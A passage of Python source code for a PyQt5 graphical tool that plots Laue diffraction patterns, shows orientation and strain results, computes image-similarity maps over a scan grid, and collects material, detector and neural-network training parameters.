self.canvas.axes.grid(True)
self.canvas.axes.legend(fontsize=8)
self.canvas.draw()
self.annot = self.canvas.axes.annotate("", xy=(0,0),
bbox=dict(boxstyle="round", fc="w"),
arrowprops=dict(arrowstyle="->"))
self.canvas.mpl_connect('motion_notify_event', self.onmovemouse)
self._createDisplay() ## display screen
##create a text string to display
if len(tth_sim) != 0:
temp_ = rotation_matrix.flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
texttstr = "Rotation matrix is: "+string1
self.setDisplayText(texttstr)
texttstr = "# Total experimental spots : "+str(len(th_exp))
self.setDisplayText(texttstr)
texttstr = "# Average residues : "+str(np.average(residues))
self.setDisplayText(texttstr)
texttstr = "# Total linked spots : "+str(len(exp_linkspots))
self.setDisplayText(texttstr)
texttstr = "# Matching rate : "+str(len(exp_linkspots)/len(tth_sim))
self.setDisplayText(texttstr)
texttstr = "# Simulated_spots\tHKL\tExperimental_spots\tResidues\t "
self.setDisplayText(texttstr)
for i in range(len(theo_index)):
texttstr = str(theo_index[i])+"\t\t"+str(sim_hkl[theo_index[i],:])+"\t"+str(exp_linkspots[i])+"\t\t"+str(residues[i])
self.setDisplayText(texttstr)
def update_annot(self, ind, vis, cont, ind1, cont1):
self.canvas.axes.cla()
self.canvas.axes.set_title("Laue pattern of pixel x=%d, y=%d (file: %s)"%(self.iy,self.ix,self.file), loc='center', fontsize=8)
self.canvas.axes.set_ylabel(r'$\chi$ (in deg)',fontsize=8)
self.canvas.axes.set_xlabel(r'2$\theta$ (in deg)', fontsize=8)
self.scatter1 = self.canvas.axes.scatter(self.Data_X, self.Data_Y, c='k', s=self.intensity, cmap="gray", label="Exp spots")
if len(self.data_theo_X) != 0:
self.scatter = self.canvas.axes.scatter(self.data_theo_X, self.data_theo_Y, s=120, facecolor='none', edgecolor='r', label="Best match spots")
if cont:
pos = self.scatter.get_offsets()[ind["ind"][0]]
n = ind["ind"][0]
if ind1 is not None and cont1:
n1 = ind1["ind"][0]
else:
n1=""
text = "ExpIndex={} \nTheoIndex={} \n2Theta={} \nChi={} \nHKL={} \nEnergy={}".format(" "+str(n1),
" "+str(n),
" "+str(np.round(self.data_theo_X[n],2)),
" "+str(np.round(self.data_theo_Y[n],2)),
" "+str(self.data_theo_hkl[n]),
" "+str(np.round(self.data_theo_energy[n],2)))
self.annot = self.canvas.axes.annotate(text, xy=pos,xytext=(20,20),textcoords="offset points",
bbox=dict(boxstyle="round", fc="gray"),
arrowprops=dict(arrowstyle="->"))
self.annot.get_bbox_patch().set_alpha(0.5)
self.annot.set_visible(True)
elif not cont and vis:
self.annot.set_visible(False)
# Trigger the canvas to update and redraw.
self.canvas.axes.grid(True)
self.canvas.axes.legend(fontsize=8)
self.canvas.draw()
def onmovemouse(self,event):
try:
vis = self.annot.get_visible()
if event.inaxes == None:
return
cont, ind = self.scatter.contains(event)
try:
cont1, ind1 = self.scatter1.contains(event)
except:
cont1, ind1 = False, None
self.update_annot(ind, vis, cont, ind1, cont1)
except:
return
def _createDisplay(self):
"""Create the display."""
self.display = QTextEdit()
self.display.setReadOnly(True)
self.layout.addWidget(self.display)
def setDisplayText(self, text):
self.display.append('%s'%text)
self.display.moveCursor(QtGui.QTextCursor.Start)
self.display.setFocus()
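## Window_allmap: interactive view of the full XY scan grid. A right click on a pixel loads the
## corresponding detector image and opens it in a popup; an image-similarity (MSE) map between
## neighbouring images of the raster can also be computed and displayed.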
class Window_allmap(QWidget):
def __init__(self, limx, limy, filenm, ccd_label, predict_single_file_nodialog, detectorparameters):
super(Window_allmap, self).__init__()
QWidget.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.lim_x, self.lim_y = limx, limy
self.filenm = filenm
self.ccd_label = ccd_label
self.detectorparameters = detectorparameters
self.diff_data = np.zeros((self.lim_x, self.lim_y))
self.predict_single_file_nodialog = predict_single_file_nodialog
self.setWindowTitle("Laue plot module (right click interactive)")
# self.myQMenuBar = QMenuBar(self)
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas1(self, width=10, height=10, dpi=100)
self.toolbar = NavigationToolbar(self.canvas, self)
self.canvas.mpl_connect('button_press_event', self.onclickImage)
self.refresh_plot = QPushButton("Refresh plot")
self.refresh_plot.clicked.connect(self.refresh_plots)
self.img_similarity = QPushButton("Calculate image similarity")
self.img_similarity.clicked.connect(self.calculate_image_similarity)
# set the layout
self.popups = []
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
self.image_grid = QLineEdit()
self.image_grid.setText("10,10")
self.path_folder = QLineEdit()
self.path_folder.setText("")
formLayout = QFormLayout()
formLayout.addRow(self.refresh_plot, self.img_similarity)
self.layout.addLayout(formLayout)
self.setLayout(self.layout)
self.draw_something()
self.setFixedSize(16777215,16777215)
def refresh_plots(self):
self.draw_something()
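## draw_something: plot the image-similarity map; a random image is shown as a placeholder
## until the similarity values have been computed.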
def draw_something(self):
self.canvas.axes.cla()
self.canvas.axes.set_title("Spatial scan Laue map", loc='center', fontsize=10)
if np.all(self.diff_data == 0):
arr = np.random.randint(low = 0, high = 255, size = (self.lim_x, self.lim_y))
else:
arr = self.diff_data
self.canvas.axes.imshow(arr.astype('uint8'), origin='lower')
self.canvas.draw()
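## calculate_image_similarity: build (current image, previous image) pairs over the raster and
## compute their mean squared error with a multiprocessing pool (mse_images worker),
## storing the results in self.diff_data.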
def calculate_image_similarity(self):
try:
values = []
count = 0
total = self.diff_data.shape[0]*self.diff_data.shape[1]
for ix in range(self.diff_data.shape[0]):
for iy in range(self.diff_data.shape[1]):
if iy == 0 and ix == 0:
continue
elif iy == 0 and ix != 0:
image_no = ix
elif iy != 0 and ix == 0:
image_no = iy * self.lim_y
elif iy != 0 and ix != 0:
image_no = iy * self.lim_y + ix
path = os.path.normpath(self.filenm[image_no].decode())
if (image_no % self.lim_y == 0) and image_no != 0:
old_image = image_no - self.lim_y
elif (image_no % self.lim_y != 0):
old_image = image_no - 1
path1 = os.path.normpath(self.filenm[old_image].decode())
values.append([path, path1, ix, iy, self.ccd_label, True, count, total])
count += 1
with multip.Pool(cpu_count()) as pool:
results = [pool.apply_async(mse_images, p) for p in values]
for r in results:
r1 = r.get()
self.diff_data[r1[2],r1[1]] = r1[0]
except:
print("Error in calculation of image similarity module")
self.draw_something()
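## onclickImage: on a right click, convert the clicked map coordinates to the image index in the
## raster, read that detector image and open it in a MyPopup_image_v1 window.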
def onclickImage(self, event123):
if event123.button == 3:
ix, iy = event123.xdata, event123.ydata
# try:
## read the saved COR file and extract exp spots info.## avoid zero index problem
ix = int(round(ix))
iy = int(round(iy))
try:
# self.lim_x * self.lim_y
if iy == 0 and ix == 0:
image_no = 0
elif iy == 0 and ix != 0:
image_no = ix
elif iy != 0 and ix == 0:
image_no = iy * self.lim_y
elif iy != 0 and ix != 0:
image_no = iy * self.lim_y + ix
path = os.path.normpath(self.filenm[image_no].decode())
Data, framedim, fliprot = IOimage.readCCDimage(path,
stackimageindex=-1,
CCDLabel=self.ccd_label,
dirname=None,
verbose=0)
except:
print(path)
print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
print("No IMAGE file could be found for the selected pixel")
return
w = MyPopup_image_v1(ix, iy, path, Data, self.ccd_label,
self.predict_single_file_nodialog, image_no,
self.detectorparameters)
w.show()
self.popups.append(w)
print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
# except:
# return
else:
print("Right click for plotting the pixel values")
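## sample_config: small read-only window that displays the sample configuration text.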
class sample_config(QWidget):
def __init__(self):
QWidget.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.layout = QVBoxLayout()
self.setLayout(self.layout)
self._createDisplay() ## display screen
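## NOTE: texttstr is assumed to be a module-level string holding the sample configuration text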
self.setDisplayText(texttstr)
def _createDisplay(self):
"""Create the display."""
self.display = QTextEdit()
self.display.setReadOnly(True)
self.layout.addWidget(self.display)
def setDisplayText(self, text):
self.display.append('%s'%text)
self.display.moveCursor(QtGui.QTextCursor.End)
self.display.setFocus()
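## MyPopup: result window for a single file. Shows experimental spots together with the spots
## simulated from each predicted orientation matrix (one colour per matrix), with hover
## annotations, and prints rotation matrices, strain, matching rate and residues in a text panel.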
class MyPopup(QWidget):
def __init__(self, match_rate12, rotation_matrix12, mat_global12, fR_pix12, filename,
straincrystal, strainsample, end_time, mode_analysis, th_exp, chi_exp, intensity, tth_sim, chi_sim,
sim_energy, sim_hkl, exp_linkspots, residues, theo_index, hkl_prediction=False):
QWidget.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas1(self, width=10, height=10, dpi=100)
self.toolbar = NavigationToolbar(self.canvas, self)
self.Data_X = th_exp*2.0
self.Data_Y = chi_exp
self.Data_index_expspot = list(range(len(th_exp)))
self.Data_I = intensity
self.hkl_prediction = hkl_prediction
self.data_theo_X = tth_sim
self.data_theo_Y = chi_sim
self.data_theo_hkl = sim_hkl
self.data_theo_energy = sim_energy
self.Data_index_simspot = list(range(len(tth_sim)))
self.file = filename
self.match_rate12987 = match_rate12
# set the layout
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
self.setLayout(self.layout)
# Normalize the intensities to a 0-100 range for use as scatter marker sizes.
self.intensity = intensity / np.amax(intensity) * 100.0
self.canvas.axes.cla()
self.canvas.axes.set_title("Laue pattern (file: %s)"%(filename), loc='center', fontsize=8)
self.canvas.axes.set_ylabel(r'$\chi$ (in deg)',fontsize=8)
self.canvas.axes.set_xlabel(r'2$\theta$ (in deg)', fontsize=8)
self.scatter1 = self.canvas.axes.scatter(th_exp*2.0, chi_exp, c='k', s=self.intensity, cmap="gray", label="Exp spots")
cycle_color = ["b","c","g","m","r","y","brown","gray","purple","orange","bisque","lime","gold",
"b","c","g","m","r","y","brown","gray","purple","orange","bisque","lime","gold",
"b","c","g","m","r","y","brown","gray","purple","orange","bisque","lime","gold"]
self.cycle_color = cycle_color
## convert into a single variable
tth_s, chi_s, color_s, label_s, theohkl_s, theoenergy_s = [], [], [], [], [], []
for ijk in range(len(match_rate12)):
if len(tth_sim[ijk]) != 0:
for okl in range(len(tth_sim[ijk])):
tth_s.append(tth_sim[ijk][okl])
chi_s.append(chi_sim[ijk][okl])
color_s.append(cycle_color[ijk])
theohkl_s.append(sim_hkl[ijk][okl])
theoenergy_s.append(sim_energy[ijk])
label_s.append("Matrix "+str(ijk+1))
self.scatter = self.canvas.axes.scatter(tth_s, chi_s, s=120, facecolor='none',
edgecolor=color_s)#, label="Matrix "+str(ijk+1))
# Trigger the canvas to update and redraw.
self.canvas.axes.grid(True)
self.canvas.axes.legend(fontsize=8)
self.canvas.draw()
self.annot = self.canvas.axes.annotate("", xy=(0,0),
bbox=dict(boxstyle="round", fc="w"),
arrowprops=dict(arrowstyle="->"))
self.canvas.mpl_connect('motion_notify_event', self.onmovemouse)
self._createDisplay() ## display screen
##create a text string to display
texttstr = "Predicted for File: "+filename+ " \n"
self.setDisplayText(texttstr)
texttstr = "# Total experimental spots : "+str(len(th_exp))
self.setDisplayText(texttstr)
self.setDisplayText("################## "+mode_analysis+" MODE ############### \n")
for ijk in range(len(match_rate12)):
if len(tth_sim[ijk]) != 0:
self.setDisplayText("--------------- Matrix "+str(ijk+1)+" \n")
texttstr = "# Average residues : "+str(np.average(residues[ijk]))
self.setDisplayText(texttstr)
texttstr = "# Total linked spots : "+str(len(exp_linkspots[ijk]))
self.setDisplayText(texttstr)
texttstr = "# Matching rate : "+str(len(exp_linkspots[ijk])/len(tth_sim[ijk]))
self.setDisplayText(texttstr)
texttstr = "Matching rate for the proposed matrix is: "+str(match_rate12[ijk][0])+ " \n"
self.setDisplayText(texttstr)
texttstr = "Identified material index is: "+str(mat_global12[ijk][0])+ " \n"
self.setDisplayText(texttstr)
temp_ = rotation_matrix12[ijk][0].flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
texttstr = "Rotation matrix is: "+string1
self.setDisplayText(texttstr)
temp_ = straincrystal[ijk][0].flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
texttstr = "Strain crystal reference frame is: "+string1
self.setDisplayText(texttstr)
temp_ = strainsample[ijk][0].flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
texttstr = "Strain sample reference frame is: "+string1
self.setDisplayText(texttstr)
texttstr = "Final pixel residues is: "+str(fR_pix12[ijk][0]) + " \n"
self.setDisplayText(texttstr)
texttstr = "Total time in seconds (Loading image, peak detection, HKL prediction, Orientation matrix computation, strain computation): "+str(end_time) + " \n"
self.setDisplayText(texttstr)
def update_annot(self, ind, vis, cont, ind1, cont1):
self.canvas.axes.cla()
self.canvas.axes.set_title("Laue pattern (file: %s)"%(self.file), loc='center', fontsize=8)
self.canvas.axes.set_ylabel(r'$\chi$ (in deg)',fontsize=8)
self.canvas.axes.set_xlabel(r'2$\theta$ (in deg)', fontsize=8)
self.scatter1 = self.canvas.axes.scatter(self.Data_X, self.Data_Y, c='k', s=self.intensity, label="Exp spots")
## convert into a single variable
tth_s, chi_s, color_s, label_s, theohkl_s, theoenergy_s = [], [], [], [], [], []
for ijk in range(len(self.match_rate12987)):
if len(self.data_theo_X[ijk]) != 0:
for okl in range(len(self.data_theo_X[ijk])):
tth_s.append(self.data_theo_X[ijk][okl])
chi_s.append(self.data_theo_Y[ijk][okl])
color_s.append(self.cycle_color[ijk])
theohkl_s.append(self.data_theo_hkl[ijk][okl])
theoenergy_s.append(self.data_theo_energy[ijk][okl])
label_s.append(ijk+1)
self.scatter = self.canvas.axes.scatter(tth_s, chi_s, s=120, facecolor='none',
edgecolor=color_s)
if ind != None and cont:
pos = self.scatter.get_offsets()[ind["ind"][0]]
n = ind["ind"][0]
else:
n=""
if ind1 != None and cont1:
pos = self.scatter1.get_offsets()[ind1["ind"][0]]
n1 = ind1["ind"][0]
else:
n1=""
try:
pp123 = self.hkl_prediction[n1,:]
except:
pp123 = "No prediction"
if n=="":
text = "\nExpIndex={} \nPrediction={}".format(" "+str(n1)," "+str(pp123))
elif n1 == "":
text = "\nMatrix={} \nTheoIndex={} \n2Theta={} \nChi={} \nHKL={} \nEnergy={}".format(
" "+str(label_s[n]),
" "+str(n),
" "+str(np.round(tth_s[n],2)),
" "+str(np.round(chi_s[n],2)),
" "+str(theohkl_s[n]),
" "+str(np.round(theoenergy_s[n],2)))
else:
text = "\nMatrix={} \nExpIndex={} \nPrediction={} \nTheoIndex={} \n2Theta={} \nChi={} \nHKL={} \nEnergy={}".format(
" "+str(label_s[n]),
" "+str(n1),
" "+str(pp123),
" "+str(n),
" "+str(np.round(tth_s[n],2)),
" "+str(np.round(chi_s[n],2)),
" "+str(theohkl_s[n]),
" "+str(np.round(theoenergy_s[n],2)))
self.annot = self.canvas.axes.annotate(text, xy=pos, xytext=(20,20), textcoords="offset points",
bbox=dict(boxstyle="round", fc="gray"),
arrowprops=dict(arrowstyle="->"))
self.annot.get_bbox_patch().set_alpha(0.5)
self.annot.set_visible(True)
# Trigger the canvas to update and redraw.
self.canvas.axes.grid(True)
self.canvas.axes.legend(fontsize=8)
self.canvas.draw()
def onmovemouse(self,event):
# try:
vis = self.annot.get_visible()
if event.inaxes == None:
return
try:
cont, ind = self.scatter.contains(event)
except:
cont, ind = False, None
try:
cont1, ind1 = self.scatter1.contains(event)
except:
cont1, ind1 = False, None
if cont or cont1:
self.update_annot(ind, vis, cont, ind1, cont1)
# except:
# return
def _createDisplay(self):
"""Create the display."""
self.display = QTextEdit()
self.display.setReadOnly(True)
self.layout.addWidget(self.display)
def setDisplayText(self, text):
self.display.append('%s'%text)
self.display.moveCursor(QtGui.QTextCursor.Start)
self.display.setFocus()
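## AnotherWindowParams: scrollable form used to configure material, simulation, detector and
## neural-network training parameters. On "Accept" the values are stored with QSettings and
## emitted to the main GUI as a dictionary through the got_signal signal.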
class AnotherWindowParams(QWidget):
got_signal = QtCore.pyqtSignal(dict)
def __init__(self, state=0, gui_state=0):
super().__init__()
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.setFixedSize(500, 500)
self.settings = QSettings("config_data_"+str(gui_state),"ConfigGUI_"+str(gui_state))
## Material detail
self.dict_LT = QComboBox()
sortednames = sorted(dictLT.dict_Materials.keys(), key=lambda x:x.lower())
for s in sortednames:
self.dict_LT.addItem(s)
self.dict_LT1 = QComboBox()
sortednames = sorted(dictLT.dict_Materials.keys(), key=lambda x:x.lower())
for s in sortednames:
self.dict_LT1.addItem(s)
if main_directory != None:
self.modelDirecSave = main_directory
else:
self.modelDirecSave = None
self.model_direc_save = QPushButton('Browse')
self.model_direc_save.clicked.connect(self.getfiles)
self.symmetry = QComboBox()
symmetry_names = ["cubic","hexagonal","orthorhombic","tetragonal","trigonal","monoclinic","triclinic"]
for s in symmetry_names:
self.symmetry.addItem(s)
self.symmetry1 = QComboBox()
symmetry_names = ["cubic","hexagonal","orthorhombic","tetragonal","trigonal","monoclinic","triclinic"]
for s in symmetry_names:
self.symmetry1.addItem(s)
self.prefix = QLineEdit()
self.prefix.setText("") ## Prefix for folder
self.hkl_max = QLineEdit()
self.hkl_max.setText("auto") ## auto or some indices of HKL
self.elements = QLineEdit()
self.elements.setText("200") ## all or some length
self.freq_rmv = QLineEdit()
self.freq_rmv.setText("1") ## auto or some indices of HKL
self.hkl_max1 = QLineEdit()
self.hkl_max1.setText("auto") ## auto or some indices of HKL
self.elements1 = QLineEdit()
self.elements1.setText("200") ## all or some length
self.freq_rmv1 = QLineEdit()
self.freq_rmv1.setText("1") ## auto or some indices of HKL
self.maximum_angle_to_search = QLineEdit()
self.maximum_angle_to_search.setText("90")
self.step_for_binning = QLineEdit()
self.step_for_binning.setText("0.1")
self.mode_of_analysis = QComboBox()
mode_ = ["1","0"]
for s in mode_:
self.mode_of_analysis.addItem(s)
self.nb_grains_per_lp = QLineEdit()
self.nb_grains_per_lp.setText("5")
self.nb_grains_per_lp1 = QLineEdit()
self.nb_grains_per_lp1.setText("5")
self.grains_nb_simulate = QLineEdit()
self.grains_nb_simulate.setText("500")
self.detectordistance = QLineEdit()
self.detectordistance.setText("79.553")
self.xycenter = QLineEdit()
self.xycenter.setText("979.32,932.31")
self.bgdetector = QLineEdit()
self.bgdetector.setText("0.37,0.447")
self.detectordim = QLineEdit()
self.detectordim.setText("2018,2016")
self.pixelsize = QLineEdit()
self.pixelsize.setText("0.0734")
self.minmaxE = QLineEdit()
self.minmaxE.setText("5,18")
self.include_scm = QComboBox()
modes = ["no", "yes"]
for s in modes:
self.include_scm.addItem(s)
self.architecture = QComboBox()
modes = ["Classical-inbuilt","from file"]
for s in modes:
self.architecture.addItem(s)
self.learningrate_rc = QLineEdit()
self.learningrate_rc.setText("1e-3,1e-5,1e-6")
self.mode_nn = QComboBox()
modes = ["Generate Data & Train","Train","Predict"]
for s in modes:
self.mode_nn.addItem(s)
self.batch_size = QLineEdit()
self.batch_size.setText("20")
self.epochs = QLineEdit()
self.epochs.setText("5")
self.grid_search_hyperparams = QComboBox()
mode_ = ["False","True"]
for s in mode_:
self.grid_search_hyperparams.addItem(s)
self.texture_model = QComboBox()
mode_ = ["in-built_Uniform_Distribution","random","from file"]
for s in mode_:
self.texture_model.addItem(s)
# button to continue training
self.btn_config = QPushButton('Accept')
self.btn_config.clicked.connect(self.send_details_mainGUI)
close_button = QPushButton("Cancel")
close_button.clicked.connect(self.close)
### set some default values
if freq_rmv_global != None:
self.freq_rmv.setText(str(freq_rmv_global))
if elements_global != None:
self.elements.setText(elements_global)
if hkl_max_global != None:
self.hkl_max.setText(hkl_max_global)
if nb_grains_per_lp_global != None:
self.nb_grains_per_lp.setText(str(nb_grains_per_lp_global))
if freq_rmv1_global != None:
self.freq_rmv1.setText(str(freq_rmv1_global))
if elements1_global != None:
self.elements1.setText(elements1_global)
if hkl_max1_global != None:
self.hkl_max1.setText(hkl_max1_global)
if nb_grains_per_lp1_global != None:
self.nb_grains_per_lp1.setText(str(nb_grains_per_lp1_global))
if include_scm_global:
self.include_scm.setCurrentText("yes")
else:
self.include_scm.setCurrentText("no")
if batch_size_global != None:
self.batch_size.setText(str(batch_size_global))
if epochs_global != None:
self.epochs.setText(str(epochs_global))
if maximum_angle_to_search_global != None:
self.maximum_angle_to_search.setText(str(maximum_angle_to_search_global))
if step_for_binning_global != None:
self.step_for_binning.setText(str(step_for_binning_global))
if grains_nb_simulate_global != None:
self.grains_nb_simulate.setText(str(grains_nb_simulate_global))
if symmetry_global != None:
self.symmetry.setCurrentText(symmetry_global)
if symmetry1_global != None:
self.symmetry1.setCurrentText(symmetry1_global)
if material_global != None:
self.dict_LT.setCurrentText(material_global)
if material1_global != None:
self.dict_LT1.setCurrentText(material1_global)
if prefix_global != None:
self.prefix.setText(prefix_global)
if detectorparameters_global != None:
self.detectordistance.setText(str(detectorparameters_global[0]))
self.xycenter.setText(str(detectorparameters_global[1])+","+str(detectorparameters_global[2]))
self.bgdetector.setText(str(detectorparameters_global[3])+","+str(detectorparameters_global[4]))
self.detectordim.setText(str(dim1_global)+","+str(dim2_global))
self.pixelsize.setText(str(pixelsize_global))
self.minmaxE.setText(str(emin_global)+","+str(emax_global))
self.layout = QVBoxLayout() # QGridLayout()
scroll = QScrollArea(self)
self.layout.addWidget(scroll)
scroll.setWidgetResizable(True)
scrollContent = QWidget(scroll)
formLayout = QFormLayout(scrollContent)
# formLayout = QFormLayout()
# formLayout.setVerticalSpacing(5)
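## Note: QLineEdit().setReadOnly(True) returns None, so these addRow calls are used here to
## insert label-only rows acting as section headers in the form.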
formLayout.addRow('Training parameters', QLineEdit().setReadOnly(True))
formLayout.addRow('Directory where \n model files are saved', self.model_direc_save)
formLayout.addRow('Material details', QLineEdit().setReadOnly(True))
formLayout.addRow('Prefix for save folder', self.prefix)
formLayout.addRow('Choose Material and Symmetry \n (in case of a single material, keep both the same)', QLineEdit().setReadOnly(True))
formLayout.addRow(self.dict_LT, self.dict_LT1)
formLayout.addRow(self.symmetry, self.symmetry1)
formLayout.addRow('Class removal frequency', QLineEdit().setReadOnly(True))
formLayout.addRow(self.freq_rmv, self.freq_rmv1)
formLayout.addRow('Class length', QLineEdit().setReadOnly(True))
formLayout.addRow(self.elements, self.elements1)
formLayout.addRow('HKL max probed', QLineEdit().setReadOnly(True))
formLayout.addRow(self.hkl_max, self.hkl_max1)
formLayout.addRow('Histogram parameters', QLineEdit().setReadOnly(True))
formLayout.addRow('Angular distance to probe (in deg)', self.maximum_angle_to_search)
formLayout.addRow('Angular bin widths (in deg)', self.step_for_binning)
formLayout.addRow('Simulation parameters', QLineEdit().setReadOnly(True))
# formLayout.addRow('Analysis mode', self.mode_of_analysis)
formLayout.addRow('Max Nb. of grains in a LP', QLineEdit().setReadOnly(True))
formLayout.addRow(self.nb_grains_per_lp, self.nb_grains_per_lp1)
formLayout.addRow('Nb. of simulations', self.grains_nb_simulate)
formLayout.addRow('Include single crystal \n misorientation', self.include_scm)
formLayout.addRow('Detector parameters', QLineEdit().setReadOnly(True))
formLayout.addRow('Detector distance', self.detectordistance)
formLayout.addRow('Detector XY center', self.xycenter)
formLayout.addRow('Detector Beta Gamma', self.bgdetector)
formLayout.addRow('Detector Pixel size', self.pixelsize)
formLayout.addRow('Detector dimensions (dim1,dim2)', self.detectordim)
formLayout.addRow('Energy (Min, Max)', self.minmaxE)
formLayout.addRow('Neural Network parameters', QLineEdit().setReadOnly(True))
formLayout.addRow('Mode of analysis', self.mode_nn)
formLayout.addRow('Model Architecture', self.architecture)
formLayout.addRow('LR, Regularization coefficient', self.learningrate_rc)
formLayout.addRow('Batch size', self.batch_size)
formLayout.addRow('Epochs', self.epochs)
formLayout.addRow('Grid search for model Params', self.grid_search_hyperparams)
formLayout.addRow('Texture for data', self.texture_model)
# formLayout.setVerticalSpacing(5)
formLayout.addRow(close_button, self.btn_config)
scrollContent.setLayout(formLayout)
scroll.setWidget(scrollContent)
self.setLayout(self.layout)
self.setFixedSize(16777215,16777215)
#self._gui_save()
#if state > 0:
# self._gui_restore()
def getfiles(self):
self.modelDirecSave = QFileDialog.getExistingDirectory(self, 'Select Folder in which model files will be saved')
def _gui_save(self):
# Save geometry
for name, obj in inspect.getmembers(self):
# type(obj) is QComboBox would miss QComboBox subclasses, so isinstance is used instead
if isinstance(obj, QComboBox):
index = obj.currentIndex() # get current index from combobox
text = obj.itemText(index) # get the text for current index
self.settings.setValue(name, text) # save combobox selection to registry
if isinstance(obj, QLineEdit):
value = obj.text()
self.settings.setValue(name, value) # save ui values, so they can be restored next time
self.settings.sync()
def _gui_restore(self):
# Restore geometry
for name, obj in inspect.getmembers(self):
if isinstance(obj, QComboBox):
index = obj.currentIndex() # get current region from combobox
value = (self.settings.value(name))
if value == "":
continue
index = obj.findText(value) # get the corresponding index for specified string in combobox
if index == -1: # add to list if not found
obj.insertItems(0, [value])
index = obj.findText(value)
obj.setCurrentIndex(index)
else:
obj.setCurrentIndex(index) # preselect a combobox value by index
if isinstance(obj, QLineEdit):
value = (self.settings.value(name))#.decode('utf-8')) # get stored value from registry
obj.setText(value) # restore lineEditFile
self.settings.sync()
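## send_details_mainGUI: save the current GUI state, derive the model/weight file paths from the
## selected materials and prefix, then emit all settings as a dictionary and close the window.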
def send_details_mainGUI(self):
self._gui_save()
detector_params = [float(self.detectordistance.text()),
float(self.xycenter.text().split(",")[0]),
float(self.xycenter.text().split(",")[1]),
float(self.bgdetector.text().split(",")[0]),
float(self.bgdetector.text().split(",")[1])]
global prefix_global, weightfile_global, modelfile_global, model_weight_file
if self.prefix.text() != prefix_global:
prefix_global = self.prefix.text()
##exp directory
if material_global == material1_global:
fn = material_global + prefix_global
else:
fn = material_global + "_" + material1_global + prefix_global
modelfile_global = self.modelDirecSave + "//" + fn
if material_global == material1_global:
if model_weight_file == "none":
weightfile_global = modelfile_global + "//" + "model_" + material_global + ".h5"
else:
weightfile_global = model_weight_file
else:
if model_weight_file == "none":
weightfile_global = modelfile_global + "//" + "model_" + material_global + "_" + material1_global + ".h5"
else:
weightfile_global = model_weight_file
# create a dictionary and emit the signal
emit_dictionary = { "material_": self.dict_LT.currentText(), ## same key as used in LaueTools
"material1_": self.dict_LT1.currentText(),
"prefix": self.prefix.text(),
"symmetry": self.symmetry.currentText(),
"symmetry1": self.symmetry1.currentText(),
"hkl_max_identify" : self.hkl_max.text(), # can be "auto" or an index i.e 12
"hkl_max_identify1" : self.hkl_max1.text(), # can be "auto" or an index i.e 12
"maximum_angle_to_search" : float(self.maximum_angle_to_search.text()),
"step_for_binning" : float(self.step_for_binning.text()),
"mode_of_analysis" : int(self.mode_of_analysis.currentText()),
"nb_grains_per_lp" : int(self.nb_grains_per_lp.text()), ## max grains to expect in a LP
"nb_grains_per_lp1" : int(self.nb_grains_per_lp1.text()),
"grains_nb_simulate" : int(self.grains_nb_simulate.text()),
"detectorparameters" : detector_params,
"pixelsize" : float(self.pixelsize.text()),
"dim1":float(self.detectordim.text().split(",")[0]),
"dim2":float(self.detectordim.text().split(",")[1]),
"emin":float(self.minmaxE.text().split(",")[0]),
"emax" : float(self.minmaxE.text().split(",")[1]),
"batch_size": int(self.batch_size.text()), ## batches of files to use while training
"epochs": int(self.epochs.text()), ## number of epochs for training
"texture": self.texture_model.currentText(),
"mode_nn": self.mode_nn.currentText(),
"grid_bool": self.grid_search_hyperparams.currentText(),
"directory": self.modelDirecSave,
"freq_rmv": int(self.freq_rmv.text()),
"freq_rmv1": int(self.freq_rmv1.text()),
"elements": self.elements.text(),
"elements1": self.elements1.text(),
"include_scm": self.include_scm.currentText(),
"lr":float(self.learningrate_rc.text().split(",")[0]),
"kc" : float(self.learningrate_rc.text().split(",")[1]),
"bc":float(self.learningrate_rc.text().split(",")[0]),
}
self.got_signal.emit(emit_dictionary)
self.close() # close the window
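## AnotherWindowLivePrediction: main prediction window. Loads a trained model, runs (live)
## predictions over a grid of experimental files and plots orientation/strain maps; the keyword
## arguments carry the thresholds and tolerances configured in the other windows.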
class AnotherWindowLivePrediction(QWidget):#QWidget QScrollArea
def __init__(self, state=0, gui_state=0, material_=None, material1_=None, emin=None, emax=None,
symmetry=None, symmetry1=None, detectorparameters=None, pixelsize=None, lattice_=None,
lattice1_=None, hkl_all_class0=None, hkl_all_class1=None, mode_spotCycleglobal=None,
softmax_threshold_global = None, mr_threshold_global = None, cap_matchrate = None,
coeff = None, coeff_overlap1212 = None, fit_peaks_gaussian_global = None,
FitPixelDev_global = None, NumberMaxofFits = None, tolerance_strain = None, tolerance_strain1 = None,
material0_limit = None, material1_limit=None, symmetry_name=None, symmetry1_name=None,
use_previous_UBmatrix_name = None, material_phase_always_present=None, crystal=None, crystal1=None,
strain_free_parameters=None, additional_expression=None):
